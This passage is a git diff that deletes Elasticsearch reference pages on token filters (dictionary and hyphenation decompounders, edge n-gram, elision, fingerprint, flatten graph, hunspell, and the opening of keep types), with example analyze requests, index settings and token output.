- -[source,console] --------------------------------------------------- -GET _analyze -{ - "tokenizer": "standard", - "filter": [ - { - "type": "dictionary_decompounder", - "word_list": ["Donau", "dampf", "meer", "schiff"] - } - ], - "text": "Donaudampfschiff" -} --------------------------------------------------- - -The filter produces the following tokens: - -[source,text] --------------------------------------------------- -[ Donaudampfschiff, Donau, dampf, schiff ] --------------------------------------------------- - -///////////////////// -[source,console-result] --------------------------------------------------- -{ - "tokens" : [ - { - "token" : "Donaudampfschiff", - "start_offset" : 0, - "end_offset" : 16, - "type" : "", - "position" : 0 - }, - { - "token" : "Donau", - "start_offset" : 0, - "end_offset" : 16, - "type" : "", - "position" : 0 - }, - { - "token" : "dampf", - "start_offset" : 0, - "end_offset" : 16, - "type" : "", - "position" : 0 - }, - { - "token" : "schiff", - "start_offset" : 0, - "end_offset" : 16, - "type" : "", - "position" : 0 - } - ] -} --------------------------------------------------- -///////////////////// - -[[analysis-dict-decomp-tokenfilter-configure-parms]] -==== Configurable parameters - -`word_list`:: -+ --- -(Required+++*+++, array of strings) -A list of subwords to look for in the token stream. If found, the subword is -included in the token output. - -Either this parameter or `word_list_path` must be specified. --- - -`word_list_path`:: -+ --- -(Required+++*+++, string) -Path to a file that contains a list of subwords to find in the token stream. If -found, the subword is included in the token output. - -This path must be absolute or relative to the `config` location, and the file -must be UTF-8 encoded. Each token in the file must be separated by a line break. - -Either this parameter or `word_list` must be specified. --- - -`max_subword_size`:: -(Optional, integer) -Maximum subword character length. Longer subword tokens are excluded from the -output. Defaults to `15`. - -`min_subword_size`:: -(Optional, integer) -Minimum subword character length. Shorter subword tokens are excluded from the -output. Defaults to `2`. - -`min_word_size`:: -(Optional, integer) -Minimum word character length. Shorter word tokens are excluded from the -output. Defaults to `5`. - -`only_longest_match`:: -(Optional, Boolean) -If `true`, only include the longest matching subword. Defaults to `false`. - -[[analysis-dict-decomp-tokenfilter-customize]] -==== Customize and add to an analyzer - -To customize the `dictionary_decompounder` filter, duplicate it to create the -basis for a new custom token filter. You can modify the filter using its -configurable parameters. - -For example, the following <> request -uses a custom `dictionary_decompounder` filter to configure a new -<>. - -The custom `dictionary_decompounder` filter find subwords in the -`analysis/example_word_list.txt` file. Subwords longer than 22 characters are -excluded from the token output. 
- -[source,console] --------------------------------------------------- -PUT dictionary_decompound_example -{ - "settings": { - "analysis": { - "analyzer": { - "standard_dictionary_decompound": { - "tokenizer": "standard", - "filter": [ "22_char_dictionary_decompound" ] - } - }, - "filter": { - "22_char_dictionary_decompound": { - "type": "dictionary_decompounder", - "word_list_path": "analysis/example_word_list.txt", - "max_subword_size": 22 - } - } - } - } -} --------------------------------------------------- diff --git a/docs/reference/analysis/tokenfilters/edgengram-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/edgengram-tokenfilter.asciidoc deleted file mode 100644 index a3c4fa36ce1..00000000000 --- a/docs/reference/analysis/tokenfilters/edgengram-tokenfilter.asciidoc +++ /dev/null @@ -1,248 +0,0 @@ -[[analysis-edgengram-tokenfilter]] -=== Edge n-gram token filter -++++ -Edge n-gram -++++ - -Forms an {wikipedia}/N-gram[n-gram] of a specified length from -the beginning of a token. - -For example, you can use the `edge_ngram` token filter to change `quick` to -`qu`. - -When not customized, the filter creates 1-character edge n-grams by default. - -This filter uses Lucene's -{lucene-analysis-docs}/ngram/EdgeNGramTokenFilter.html[EdgeNGramTokenFilter]. - -[NOTE] -==== -The `edge_ngram` filter is similar to the <>. However, the `edge_ngram` only outputs n-grams that start at the -beginning of a token. These edge n-grams are useful for -<> queries. -==== - -[[analysis-edgengram-tokenfilter-analyze-ex]] -==== Example - -The following <> request uses the `edge_ngram` -filter to convert `the quick brown fox jumps` to 1-character and 2-character -edge n-grams: - -[source,console] --------------------------------------------------- -GET _analyze -{ - "tokenizer": "standard", - "filter": [ - { "type": "edge_ngram", - "min_gram": 1, - "max_gram": 2 - } - ], - "text": "the quick brown fox jumps" -} --------------------------------------------------- - -The filter produces the following tokens: - -[source,text] --------------------------------------------------- -[ t, th, q, qu, b, br, f, fo, j, ju ] --------------------------------------------------- - -///////////////////// -[source,console-result] --------------------------------------------------- -{ - "tokens" : [ - { - "token" : "t", - "start_offset" : 0, - "end_offset" : 3, - "type" : "", - "position" : 0 - }, - { - "token" : "th", - "start_offset" : 0, - "end_offset" : 3, - "type" : "", - "position" : 0 - }, - { - "token" : "q", - "start_offset" : 4, - "end_offset" : 9, - "type" : "", - "position" : 1 - }, - { - "token" : "qu", - "start_offset" : 4, - "end_offset" : 9, - "type" : "", - "position" : 1 - }, - { - "token" : "b", - "start_offset" : 10, - "end_offset" : 15, - "type" : "", - "position" : 2 - }, - { - "token" : "br", - "start_offset" : 10, - "end_offset" : 15, - "type" : "", - "position" : 2 - }, - { - "token" : "f", - "start_offset" : 16, - "end_offset" : 19, - "type" : "", - "position" : 3 - }, - { - "token" : "fo", - "start_offset" : 16, - "end_offset" : 19, - "type" : "", - "position" : 3 - }, - { - "token" : "j", - "start_offset" : 20, - "end_offset" : 25, - "type" : "", - "position" : 4 - }, - { - "token" : "ju", - "start_offset" : 20, - "end_offset" : 25, - "type" : "", - "position" : 4 - } - ] -} --------------------------------------------------- -///////////////////// - -[[analysis-edgengram-tokenfilter-analyzer-ex]] -==== Add to an analyzer - -The following <> request uses the -`edge_ngram` filter to 
configure a new -<>. - -[source,console] --------------------------------------------------- -PUT edge_ngram_example -{ - "settings": { - "analysis": { - "analyzer": { - "standard_edge_ngram": { - "tokenizer": "standard", - "filter": [ "edge_ngram" ] - } - } - } - } -} --------------------------------------------------- - -[[analysis-edgengram-tokenfilter-configure-parms]] -==== Configurable parameters - -`max_gram`:: -+ --- -(Optional, integer) -Maximum character length of a gram. For custom token filters, defaults to `2`. -For the built-in `edge_ngram` filter, defaults to `1`. - -See <>. --- - -`min_gram`:: -(Optional, integer) -Minimum character length of a gram. Defaults to `1`. - -`preserve_original`:: -(Optional, Boolean) -Emits original token when set to `true`. Defaults to `false`. - -`side`:: -+ --- -(Optional, string) -Deprecated. Indicates whether to truncate tokens from the `front` or `back`. -Defaults to `front`. - -Instead of using the `back` value, you can use the -<> token filter before and after the -`edge_ngram` filter to achieve the same results. --- - -[[analysis-edgengram-tokenfilter-customize]] -==== Customize - -To customize the `edge_ngram` filter, duplicate it to create the basis -for a new custom token filter. You can modify the filter using its configurable -parameters. - -For example, the following request creates a custom `edge_ngram` -filter that forms n-grams between 3-5 characters. - -[source,console] --------------------------------------------------- -PUT edge_ngram_custom_example -{ - "settings": { - "analysis": { - "analyzer": { - "default": { - "tokenizer": "whitespace", - "filter": [ "3_5_edgegrams" ] - } - }, - "filter": { - "3_5_edgegrams": { - "type": "edge_ngram", - "min_gram": 3, - "max_gram": 5 - } - } - } - } -} --------------------------------------------------- - -[[analysis-edgengram-tokenfilter-max-gram-limits]] -==== Limitations of the `max_gram` parameter - -The `edge_ngram` filter's `max_gram` value limits the character length of -tokens. When the `edge_ngram` filter is used with an index analyzer, this -means search terms longer than the `max_gram` length may not match any indexed -terms. - -For example, if the `max_gram` is `3`, searches for `apple` won't match the -indexed term `app`. - -To account for this, you can use the -<> filter with a search analyzer -to shorten search terms to the `max_gram` character length. However, this could -return irrelevant results. - -For example, if the `max_gram` is `3` and search terms are truncated to three -characters, the search term `apple` is shortened to `app`. This means searches -for `apple` return any indexed terms matching `app`, such as `apply`, `snapped`, -and `apple`. - -We recommend testing both approaches to see which best fits your -use case and desired search experience. diff --git a/docs/reference/analysis/tokenfilters/elision-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/elision-tokenfilter.asciidoc deleted file mode 100644 index 3d6d629886c..00000000000 --- a/docs/reference/analysis/tokenfilters/elision-tokenfilter.asciidoc +++ /dev/null @@ -1,186 +0,0 @@ -[[analysis-elision-tokenfilter]] -=== Elision token filter -++++ -Elision -++++ - -Removes specified {wikipedia}/Elision[elisions] from -the beginning of tokens. For example, you can use this filter to change -`l'avion` to `avion`. 
- -When not customized, the filter removes the following French elisions by default: - -`l'`, `m'`, `t'`, `qu'`, `n'`, `s'`, `j'`, `d'`, `c'`, `jusqu'`, `quoiqu'`, -`lorsqu'`, `puisqu'` - -Customized versions of this filter are included in several of {es}'s built-in -<>: - -* <> -* <> -* <> -* <> - -This filter uses Lucene's -{lucene-analysis-docs}/util/ElisionFilter.html[ElisionFilter]. - -[[analysis-elision-tokenfilter-analyze-ex]] -==== Example - -The following <> request uses the `elision` -filter to remove `j'` from `j’examine près du wharf`: - -[source,console] --------------------------------------------------- -GET _analyze -{ - "tokenizer" : "standard", - "filter" : ["elision"], - "text" : "j’examine près du wharf" -} --------------------------------------------------- - -The filter produces the following tokens: - -[source,text] --------------------------------------------------- -[ examine, près, du, wharf ] --------------------------------------------------- - -///////////////////// -[source,console-result] --------------------------------------------------- -{ - "tokens" : [ - { - "token" : "examine", - "start_offset" : 0, - "end_offset" : 9, - "type" : "", - "position" : 0 - }, - { - "token" : "près", - "start_offset" : 10, - "end_offset" : 14, - "type" : "", - "position" : 1 - }, - { - "token" : "du", - "start_offset" : 15, - "end_offset" : 17, - "type" : "", - "position" : 2 - }, - { - "token" : "wharf", - "start_offset" : 18, - "end_offset" : 23, - "type" : "", - "position" : 3 - } - ] -} --------------------------------------------------- -///////////////////// - -[[analysis-elision-tokenfilter-analyzer-ex]] -==== Add to an analyzer - -The following <> request uses the -`elision` filter to configure a new -<>. - -[source,console] --------------------------------------------------- -PUT /elision_example -{ - "settings": { - "analysis": { - "analyzer": { - "whitespace_elision": { - "tokenizer": "whitespace", - "filter": [ "elision" ] - } - } - } - } -} --------------------------------------------------- - -[[analysis-elision-tokenfilter-configure-parms]] -==== Configurable parameters - -[[analysis-elision-tokenfilter-articles]] -`articles`:: -+ --- -(Required+++*+++, array of string) -List of elisions to remove. - -To be removed, the elision must be at the beginning of a token and be -immediately followed by an apostrophe. Both the elision and apostrophe are -removed. - -For custom `elision` filters, either this parameter or `articles_path` must be -specified. --- - -`articles_path`:: -+ --- -(Required+++*+++, string) -Path to a file that contains a list of elisions to remove. - -This path must be absolute or relative to the `config` location, and the file -must be UTF-8 encoded. Each elision in the file must be separated by a line -break. - -To be removed, the elision must be at the beginning of a token and be -immediately followed by an apostrophe. Both the elision and apostrophe are -removed. - -For custom `elision` filters, either this parameter or `articles` must be -specified. --- - -`articles_case`:: -(Optional, Boolean) -If `true`, the filter treats any provided elisions as case sensitive. -Defaults to `false`. - -[[analysis-elision-tokenfilter-customize]] -==== Customize - -To customize the `elision` filter, duplicate it to create the basis -for a new custom token filter. You can modify the filter using its configurable -parameters. 
- -For example, the following request creates a custom case-sensitive `elision` -filter that removes the `l'`, `m'`, `t'`, `qu'`, `n'`, `s'`, -and `j'` elisions: - -[source,console] --------------------------------------------------- -PUT /elision_case_sensitive_example -{ - "settings": { - "analysis": { - "analyzer": { - "default": { - "tokenizer": "whitespace", - "filter": [ "elision_case_sensitive" ] - } - }, - "filter": { - "elision_case_sensitive": { - "type": "elision", - "articles": [ "l", "m", "t", "qu", "n", "s", "j" ], - "articles_case": true - } - } - } - } -} --------------------------------------------------- diff --git a/docs/reference/analysis/tokenfilters/fingerprint-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/fingerprint-tokenfilter.asciidoc deleted file mode 100644 index 78a96376351..00000000000 --- a/docs/reference/analysis/tokenfilters/fingerprint-tokenfilter.asciidoc +++ /dev/null @@ -1,138 +0,0 @@ -[[analysis-fingerprint-tokenfilter]] -=== Fingerprint token filter -++++ -Fingerprint -++++ - -Sorts and removes duplicate tokens from a token stream, then concatenates the -stream into a single output token. - -For example, this filter changes the `[ the, fox, was, very, very, quick ]` -token stream as follows: - -. Sorts the tokens alphabetically to `[ fox, quick, the, very, very, was ]` - -. Removes a duplicate instance of the `very` token. - -. Concatenates the token stream into a single output token: `[ fox quick the very was ]` - -Output tokens produced by this filter are useful for -fingerprinting and clustering a body of text as described in the -https://github.com/OpenRefine/OpenRefine/wiki/Clustering-In-Depth#fingerprint[OpenRefine -project]. - -This filter uses Lucene's -{lucene-analysis-docs}/miscellaneous/FingerprintFilter.html[FingerprintFilter]. - -[[analysis-fingerprint-tokenfilter-analyze-ex]] -==== Example - -The following <> request uses the `fingerprint` -filter to create a single output token for the text `zebra jumps over resting -resting dog`: - -[source,console] --------------------------------------------------- -GET _analyze -{ - "tokenizer" : "whitespace", - "filter" : ["fingerprint"], - "text" : "zebra jumps over resting resting dog" -} --------------------------------------------------- - -The filter produces the following token: - -[source,text] --------------------------------------------------- -[ dog jumps over resting zebra ] --------------------------------------------------- - -///////////////////// -[source,console-result] --------------------------------------------------- -{ - "tokens" : [ - { - "token" : "dog jumps over resting zebra", - "start_offset" : 0, - "end_offset" : 36, - "type" : "fingerprint", - "position" : 0 - } - ] -} --------------------------------------------------- -///////////////////// - -[[analysis-fingerprint-tokenfilter-analyzer-ex]] -==== Add to an analyzer - -The following <> request uses the -`fingerprint` filter to configure a new <>. - -[source,console] --------------------------------------------------- -PUT fingerprint_example -{ - "settings": { - "analysis": { - "analyzer": { - "whitespace_fingerprint": { - "tokenizer": "whitespace", - "filter": [ "fingerprint" ] - } - } - } - } -} --------------------------------------------------- - -[[analysis-fingerprint-tokenfilter-configure-parms]] -==== Configurable parameters - -[[analysis-fingerprint-tokenfilter-max-size]] -`max_output_size`:: -(Optional, integer) -Maximum character length, including whitespace, of the output token.
Defaults to -`255`. Concatenated tokens longer than this will result in no token output. - -`separator`:: -(Optional, string) -Character to use to concatenate the token stream input. Defaults to a space. - -[[analysis-fingerprint-tokenfilter-customize]] -==== Customize - -To customize the `fingerprint` filter, duplicate it to create the basis -for a new custom token filter. You can modify the filter using its configurable -parameters. - -For example, the following request creates a custom `fingerprint` filter that -uses `+` to concatenate the token stream. The filter also limits -output tokens to `100` characters or fewer. - -[source,console] --------------------------------------------------- -PUT custom_fingerprint_example -{ - "settings": { - "analysis": { - "analyzer": { - "whitespace_": { - "tokenizer": "whitespace", - "filter": [ "fingerprint_plus_concat" ] - } - }, - "filter": { - "fingerprint_plus_concat": { - "type": "fingerprint", - "max_output_size": 100, - "separator": "+" - } - } - } - } -} --------------------------------------------------- diff --git a/docs/reference/analysis/tokenfilters/flatten-graph-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/flatten-graph-tokenfilter.asciidoc deleted file mode 100644 index b719ea376a2..00000000000 --- a/docs/reference/analysis/tokenfilters/flatten-graph-tokenfilter.asciidoc +++ /dev/null @@ -1,227 +0,0 @@ -[[analysis-flatten-graph-tokenfilter]] -=== Flatten graph token filter -++++ -Flatten graph -++++ - -Flattens a <> produced by a graph token filter, such -as <> or -<>. - -Flattening a token graph containing -<> makes the graph -suitable for <>. Otherwise, indexing does -not support token graphs containing multi-position tokens. - -[WARNING] -==== -Flattening graphs is a lossy process. - -If possible, avoid using the `flatten_graph` filter. Instead, use graph token -filters in <> only. This eliminates -the need for the `flatten_graph` filter. -==== - -The `flatten_graph` filter uses Lucene's -{lucene-analysis-docs}/core/FlattenGraphFilter.html[FlattenGraphFilter]. - -[[analysis-flatten-graph-tokenfilter-analyze-ex]] -==== Example - -To see how the `flatten_graph` filter works, you first need to produce a token -graph containing multi-position tokens. - -The following <> request uses the `synonym_graph` -filter to add `dns` as a multi-position synonym for `domain name system` in the -text `domain name system is fragile`: - -[source,console] ----- -GET /_analyze -{ - "tokenizer": "standard", - "filter": [ - { - "type": "synonym_graph", - "synonyms": [ "dns, domain name system" ] - } - ], - "text": "domain name system is fragile" -} ----- - -The filter produces the following token graph with `dns` as a multi-position -token.
- -image::images/analysis/token-graph-dns-synonym-ex.svg[align="center"] - -//// -[source,console-result] ----- -{ - "tokens": [ - { - "token": "dns", - "start_offset": 0, - "end_offset": 18, - "type": "SYNONYM", - "position": 0, - "positionLength": 3 - }, - { - "token": "domain", - "start_offset": 0, - "end_offset": 6, - "type": "", - "position": 0 - }, - { - "token": "name", - "start_offset": 7, - "end_offset": 11, - "type": "", - "position": 1 - }, - { - "token": "system", - "start_offset": 12, - "end_offset": 18, - "type": "", - "position": 2 - }, - { - "token": "is", - "start_offset": 19, - "end_offset": 21, - "type": "", - "position": 3 - }, - { - "token": "fragile", - "start_offset": 22, - "end_offset": 29, - "type": "", - "position": 4 - } - ] -} ----- -//// - -Indexing does not support token graphs containing multi-position tokens. To make -this token graph suitable for indexing, it needs to be flattened. - -To flatten the token graph, add the `flatten_graph` filter after the -`synonym_graph` filter in the previous analyze API request. - -[source,console] ----- -GET /_analyze -{ - "tokenizer": "standard", - "filter": [ - { - "type": "synonym_graph", - "synonyms": [ "dns, domain name system" ] - }, - "flatten_graph" - ], - "text": "domain name system is fragile" -} ----- - -The filter produces the following flattened token graph, which is suitable for -indexing. - -image::images/analysis/token-graph-dns-invalid-ex.svg[align="center"] - -//// -[source,console-result] ----- -{ - "tokens": [ - { - "token": "dns", - "start_offset": 0, - "end_offset": 18, - "type": "SYNONYM", - "position": 0, - "positionLength": 3 - }, - { - "token": "domain", - "start_offset": 0, - "end_offset": 6, - "type": "", - "position": 0 - }, - { - "token": "name", - "start_offset": 7, - "end_offset": 11, - "type": "", - "position": 1 - }, - { - "token": "system", - "start_offset": 12, - "end_offset": 18, - "type": "", - "position": 2 - }, - { - "token": "is", - "start_offset": 19, - "end_offset": 21, - "type": "", - "position": 3 - }, - { - "token": "fragile", - "start_offset": 22, - "end_offset": 29, - "type": "", - "position": 4 - } - ] -} ----- -//// - -[[analysis-keyword-marker-tokenfilter-analyzer-ex]] -==== Add to an analyzer - -The following <> request uses the -`flatten_graph` token filter to configure a new -<>. - -In this analyzer, a custom `word_delimiter_graph` filter produces token graphs -containing catenated, multi-position tokens. The `flatten_graph` filter flattens -these token graphs, making them suitable for indexing. - -[source,console] ----- -PUT /my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_custom_index_analyzer": { - "type": "custom", - "tokenizer": "standard", - "filter": [ - "my_custom_word_delimiter_graph_filter", - "flatten_graph" - ] - } - }, - "filter": { - "my_custom_word_delimiter_graph_filter": { - "type": "word_delimiter_graph", - "catenate_all": true - } - } - } - } -} ----- \ No newline at end of file diff --git a/docs/reference/analysis/tokenfilters/hunspell-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/hunspell-tokenfilter.asciidoc deleted file mode 100644 index 068ee36877f..00000000000 --- a/docs/reference/analysis/tokenfilters/hunspell-tokenfilter.asciidoc +++ /dev/null @@ -1,247 +0,0 @@ -[[analysis-hunspell-tokenfilter]] -=== Hunspell token filter -++++ -Hunspell -++++ - -Provides <> based on a provided -{wikipedia}/Hunspell[Hunspell dictionary]. 
The `hunspell` -filter requires -<> of one or more -language-specific Hunspell dictionaries. - -This filter uses Lucene's -{lucene-analysis-docs}/hunspell/HunspellStemFilter.html[HunspellStemFilter]. - -[TIP] -==== -If available, we recommend trying an algorithmic stemmer for your language -before using the <> token filter. -In practice, algorithmic stemmers typically outperform dictionary stemmers. -See <>. -==== - -[[analysis-hunspell-tokenfilter-dictionary-config]] -==== Configure Hunspell dictionaries - -By default, Hunspell dictionaries are stored and detected on a dedicated -hunspell directory on the filesystem: `/hunspell`. Each dictionary -is expected to have its own directory, named after its associated language and -locale (e.g., `pt_BR`, `en_GB`). This dictionary directory is expected to hold a -single `.aff` and one or more `.dic` files, all of which will automatically be -picked up. For example, assuming the default `/hunspell` path -is used, the following directory layout will define the `en_US` dictionary: - -[source,txt] --------------------------------------------------- -- config - |-- hunspell - | |-- en_US - | | |-- en_US.dic - | | |-- en_US.aff --------------------------------------------------- - -Each dictionary can be configured with one setting: - -[[analysis-hunspell-ignore-case-settings]] -`ignore_case`:: -(Static, Boolean) -If true, dictionary matching will be case insensitive. Defaults to `false`. - -This setting can be configured globally in `elasticsearch.yml` using -`indices.analysis.hunspell.dictionary.ignore_case`. - -To configure the setting for a specific locale, use the -`indices.analysis.hunspell.dictionary..ignore_case` setting (e.g., for -the `en_US` (American English) locale, the setting is -`indices.analysis.hunspell.dictionary.en_US.ignore_case`). - -It is also possible to add `settings.yml` file under the dictionary -directory which holds these settings. This overrides any other `ignore_case` -settings defined in `elasticsearch.yml`. - -[[analysis-hunspell-tokenfilter-analyze-ex]] -==== Example - -The following analyze API request uses the `hunspell` filter to stem -`the foxes jumping quickly` to `the fox jump quick`. - -The request specifies the `en_US` locale, meaning that the -`.aff` and `.dic` files in the `/hunspell/en_US` directory are used -for the Hunspell dictionary. - -[source,console] ----- -GET /_analyze -{ - "tokenizer": "standard", - "filter": [ - { - "type": "hunspell", - "locale": "en_US" - } - ], - "text": "the foxes jumping quickly" -} ----- - -The filter produces the following tokens: - -[source,text] ----- -[ the, fox, jump, quick ] ----- - -//// -[source,console-result] ----- -{ - "tokens": [ - { - "token": "the", - "start_offset": 0, - "end_offset": 3, - "type": "", - "position": 0 - }, - { - "token": "fox", - "start_offset": 4, - "end_offset": 9, - "type": "", - "position": 1 - }, - { - "token": "jump", - "start_offset": 10, - "end_offset": 17, - "type": "", - "position": 2 - }, - { - "token": "quick", - "start_offset": 18, - "end_offset": 25, - "type": "", - "position": 3 - } - ] -} ----- -//// - -[[analysis-hunspell-tokenfilter-configure-parms]] -==== Configurable parameters - -[[analysis-hunspell-tokenfilter-dictionary-param]] -`dictionary`:: -(Optional, string or array of strings) -One or more `.dic` files (e.g, `en_US.dic, my_custom.dic`) to use for the -Hunspell dictionary. 
-+ -By default, the `hunspell` filter uses all `.dic` files in the -`/hunspell/` directory specified using the -`lang`, `language`, or `locale` parameter. To use another directory, the -directory's path must be registered using the -<> setting. - -`dedup`:: -(Optional, Boolean) -If `true`, duplicate tokens are removed from the filter's output. Defaults to -`true`. - -`lang`:: -(Required*, string) -An alias for the <>. -+ -If this parameter is not specified, the `language` or `locale` parameter is -required. - -`language`:: -(Required*, string) -An alias for the <>. -+ -If this parameter is not specified, the `lang` or `locale` parameter is -required. - -[[analysis-hunspell-tokenfilter-locale-param]] -`locale`:: -(Required*, string) -Locale directory used to specify the `.aff` and `.dic` files for a Hunspell -dictionary. See <>. -+ -If this parameter is not specified, the `lang` or `language` parameter is -required. - -`longest_only`:: -(Optional, Boolean) -If `true`, only the longest stemmed version of each token is -included in the output. If `false`, all stemmed versions of the token are -included. Defaults to `false`. - -[[analysis-hunspell-tokenfilter-analyzer-ex]] -==== Customize and add to an analyzer - -To customize the `hunspell` filter, duplicate it to create the -basis for a new custom token filter. You can modify the filter using its -configurable parameters. - -For example, the following <> request -uses a custom `hunspell` filter, `my_en_US_dict_stemmer`, to configure a new -<>. - -The `my_en_US_dict_stemmer` filter uses a `locale` of `en_US`, meaning that the -`.aff` and `.dic` files in the `/hunspell/en_US` directory are -used. The filter also includes a `dedup` argument of `false`, meaning that -duplicate tokens added from the dictionary are not removed from the filter's -output. - -[source,console] ----- -PUT /my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "en": { - "tokenizer": "standard", - "filter": [ "my_en_US_dict_stemmer" ] - } - }, - "filter": { - "my_en_US_dict_stemmer": { - "type": "hunspell", - "locale": "en_US", - "dedup": false - } - } - } - } -} ----- - -[[analysis-hunspell-tokenfilter-settings]] -==== Settings - -In addition to the <>, you can configure the following global settings for the `hunspell` -filter using `elasticsearch.yml`: - -`indices.analysis.hunspell.dictionary.lazy`:: -(Static, Boolean) -If `true`, the loading of Hunspell dictionaries is deferred until a dictionary -is used. If `false`, the dictionary directory is checked for dictionaries when -the node starts, and any dictionaries are automatically loaded. Defaults to -`false`. - -[[indices-analysis-hunspell-dictionary-location]] -`indices.analysis.hunspell.dictionary.location`:: -(Static, string) -Path to a Hunspell dictionary directory. This path must be absolute or -relative to the `config` location. -+ -By default, the `/hunspell` directory is used, as described in -<>. diff --git a/docs/reference/analysis/tokenfilters/hyphenation-decompounder-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/hyphenation-decompounder-tokenfilter.asciidoc deleted file mode 100644 index eed66d81e91..00000000000 --- a/docs/reference/analysis/tokenfilters/hyphenation-decompounder-tokenfilter.asciidoc +++ /dev/null @@ -1,154 +0,0 @@ -[[analysis-hyp-decomp-tokenfilter]] -=== Hyphenation decompounder token filter -++++ -Hyphenation decompounder -++++ - -Uses XML-based hyphenation patterns to find potential subwords in compound -words.
These subwords are then checked against the specified word list. Subwords not -in the list are excluded from the token output. - -This filter uses Lucene's -{lucene-analysis-docs}/compound/HyphenationCompoundWordTokenFilter.html[HyphenationCompoundWordTokenFilter], -which was built for Germanic languages. - -[[analysis-hyp-decomp-tokenfilter-analyze-ex]] -==== Example - -The following <> request uses the -`hyphenation_decompounder` filter to find subwords in `Kaffeetasse` based on -German hyphenation patterns in the `analysis/hyphenation_patterns.xml` file. The -filter then checks these subwords against a list of specified words: `kaffee`, -`zucker`, and `tasse`. - -[source,console] --------------------------------------------------- -GET _analyze -{ - "tokenizer": "standard", - "filter": [ - { - "type": "hyphenation_decompounder", - "hyphenation_patterns_path": "analysis/hyphenation_patterns.xml", - "word_list": ["Kaffee", "zucker", "tasse"] - } - ], - "text": "Kaffeetasse" -} --------------------------------------------------- -// TEST[skip: requires a valid hyphenation_patterns.xml file for DE-DR] - -The filter produces the following tokens: - -[source,text] --------------------------------------------------- -[ Kaffeetasse, Kaffee, tasse ] --------------------------------------------------- - -[[analysis-hyp-decomp-tokenfilter-configure-parms]] -==== Configurable parameters - -`hyphenation_patterns_path`:: -+ --- -(Required, string) -Path to an Apache FOP (Formatting Objects Processor) XML hyphenation pattern file. - -This path must be absolute or relative to the `config` location. Only FOP v1.2 -compatible files are supported. - -For example FOP XML hyphenation pattern files, refer to: - -* http://offo.sourceforge.net/#FOP+XML+Hyphenation+Patterns[Objects For Formatting Objects (OFFO) Sourceforge project] -* https://sourceforge.net/projects/offo/files/offo-hyphenation/1.2/offo-hyphenation_v1.2.zip/download[offo-hyphenation_v1.2.zip direct download] (v2.0 and above hyphenation pattern files are not supported) --- - -`word_list`:: -+ --- -(Required+++*+++, array of strings) -A list of subwords. Subwords found using the hyphenation pattern but not in this -list are excluded from the token output. - -You can use the <> -filter to test the quality of word lists before implementing them. - -Either this parameter or `word_list_path` must be specified. --- - -`word_list_path`:: -+ --- -(Required+++*+++, string) -Path to a file containing a list of subwords. Subwords found using the -hyphenation pattern but not in this list are excluded from the token output. - -This path must be absolute or relative to the `config` location, and the file -must be UTF-8 encoded. Each token in the file must be separated by a line break. - -You can use the <> -filter to test the quality of word lists before implementing them. - -Either this parameter or `word_list` must be specified. --- - -`max_subword_size`:: -(Optional, integer) -Maximum subword character length. Longer subword tokens are excluded from the -output. Defaults to `15`. - -`min_subword_size`:: -(Optional, integer) -Minimum subword character length. Shorter subword tokens are excluded from the -output. Defaults to `2`. - -`min_word_size`:: -(Optional, integer) -Minimum word character length. Shorter word tokens are excluded from the -output. Defaults to `5`. - -`only_longest_match`:: -(Optional, Boolean) -If `true`, only include the longest matching subword. Defaults to `false`. 
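The `word_list` and `word_list_path` descriptions above suggest vetting a word list with the `dictionary_decompounder` filter before wiring it into this filter. The snippet below is a minimal sketch of that check, reusing the `Kaffee`, `zucker`, and `tasse` word list from the example above; the tokens it returns show which subwords the list actually surfaces for a given compound:

[source,console]
--------------------------------------------------
GET _analyze
{
  "tokenizer": "standard",
  "filter": [
    {
      "type": "dictionary_decompounder",
      "word_list": [ "Kaffee", "zucker", "tasse" ]
    }
  ],
  "text": "Kaffeetasse"
}
--------------------------------------------------

If the brute-force check surfaces unexpected subwords, or misses expected ones, adjust the list before using it with the `word_list` or `word_list_path` parameter here.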
- -[[analysis-hyp-decomp-tokenfilter-customize]] -==== Customize and add to an analyzer - -To customize the `hyphenation_decompounder` filter, duplicate it to create the -basis for a new custom token filter. You can modify the filter using its -configurable parameters. - -For example, the following <> request -uses a custom `hyphenation_decompounder` filter to configure a new -<>. - -The custom `hyphenation_decompounder` filter find subwords based on hyphenation -patterns in the `analysis/hyphenation_patterns.xml` file. The filter then checks -these subwords against the list of words specified in the -`analysis/example_word_list.txt` file. Subwords longer than 22 characters are -excluded from the token output. - -[source,console] --------------------------------------------------- -PUT hyphenation_decompound_example -{ - "settings": { - "analysis": { - "analyzer": { - "standard_hyphenation_decompound": { - "tokenizer": "standard", - "filter": [ "22_char_hyphenation_decompound" ] - } - }, - "filter": { - "22_char_hyphenation_decompound": { - "type": "hyphenation_decompounder", - "word_list_path": "analysis/example_word_list.txt", - "hyphenation_patterns_path": "analysis/hyphenation_patterns.xml", - "max_subword_size": 22 - } - } - } - } -} --------------------------------------------------- diff --git a/docs/reference/analysis/tokenfilters/keep-types-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/keep-types-tokenfilter.asciidoc deleted file mode 100644 index 9fca0275e80..00000000000 --- a/docs/reference/analysis/tokenfilters/keep-types-tokenfilter.asciidoc +++ /dev/null @@ -1,202 +0,0 @@ -[[analysis-keep-types-tokenfilter]] -=== Keep types token filter -++++ -Keep types -++++ - -Keeps or removes tokens of a specific type. For example, you can use this filter -to change `3 quick foxes` to `quick foxes` by keeping only `` -(alphanumeric) tokens. - -[NOTE] -.Token types -==== -Token types are set by the <> when converting -characters to tokens. Token types can vary between tokenizers. - -For example, the <> tokenizer can -produce a variety of token types, including ``, ``, and -``. Simpler analyzers, like the -<> tokenizer, only produce the `word` -token type. - -Certain token filters can also add token types. For example, the -<> filter can add the `` token -type. -==== - -This filter uses Lucene's -{lucene-analysis-docs}/core/TypeTokenFilter.html[TypeTokenFilter]. - -[[analysis-keep-types-tokenfilter-analyze-include-ex]] -==== Include example - -The following <> request uses the `keep_types` -filter to keep only `` (numeric) tokens from `1 quick fox 2 lazy dogs`. 
